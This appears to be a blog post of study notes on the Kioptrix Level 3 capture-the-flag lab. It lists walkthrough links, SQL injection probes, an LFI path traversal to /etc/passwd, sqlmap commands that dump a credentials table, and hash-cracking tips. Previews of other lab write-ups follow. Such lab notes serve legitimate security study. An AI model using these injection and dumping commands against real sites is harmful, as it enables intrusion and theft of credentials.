Skip to main content

VMW - Kioptix level 1.3


2. https://blog.g0tmi1k.com/2011/08/kioptrix-level-3   …shows commands and videos but doesn’t explain what those select statements do unlike above site. Those select statement can be bypassed if Sqlmap is used instead to get hash
  1. https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
  2. https://digital-cowboy.github.io/2017/kioptrix-level-3-walkthrough/



  1. Ssh and http
    1. Apache 2.2.8 php 5.2.4 ubuntu 5.6
  2. http://kioptrix3.com/gallery/gallery.php?id=1'
The thing that really caught our eye here was the “id” parameter in the URL. So we attempted to inject a single quote ( ‘ ) to try and see if the application was vulnerable to SQL Injection. And YES! Its vulnerable to SQL Injection because it throws the error –
Our links should look like that:
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7– (Error – Unknown Column)
We will do this until it shows up in the unknown columns. If it shows the unknown column error on N, that means it has the total number of Columns N-1 because it shows the content in order by N-1 so in this case, the number of columns are 6.

  1. LFI using. Didn’t word w/o html
    1. http://IP/index.php?system=../../../../../etc/passwd.html
  2. Look at the source of all the pages and found Gallarific module which was commented out and susceptible SQL injection attack
  3.  /pentest/exploits/exploitdb or /usr/share/exploitdb > grep -I gallarific  files.csv
  4. At the login page shows it is LotusCMS application . One could use Metasploit to exploit the vulnerabiliy
  5. Pyhon sqlmap.py -u "http:kioptrix3.com/gallery/gallery/php?id=1" --dbs will show database names (but SQLMAP is not allowed in the exam)
    1. Python sqlmap.py -u “http://www.example.com/news.php?id=11” -D db363851433 –tables
Where db363851433 is the name of database
  1. Python sqlmap.py" -u “http://www.example.com/news.php?id=11” -D gallery -T dev_accounts -C id,password,username --dump…. Will show the table with username and hash which can be unhash within Kali or online [https://www.yeahhub.com/live-sql-injection-exploitation-sqlmap-detailed-guide/]
  1. You can also use “hash-identifier” tool to verify the hash type whether its MD5, SHA1 or any other
  2. "To Crack the hash, you can also use hashcat tool which is pre-installed in Kali Linux machine
From <https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/>




Comments

Post a Comment

Popular posts from this blog

VM 9 : PHP Include And Post Exploitation

Walkthrough 1.        https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2.        Ine [] 3.        http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4.        http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT    STATE SERVICE 80/tcp open   http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
1 comment
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more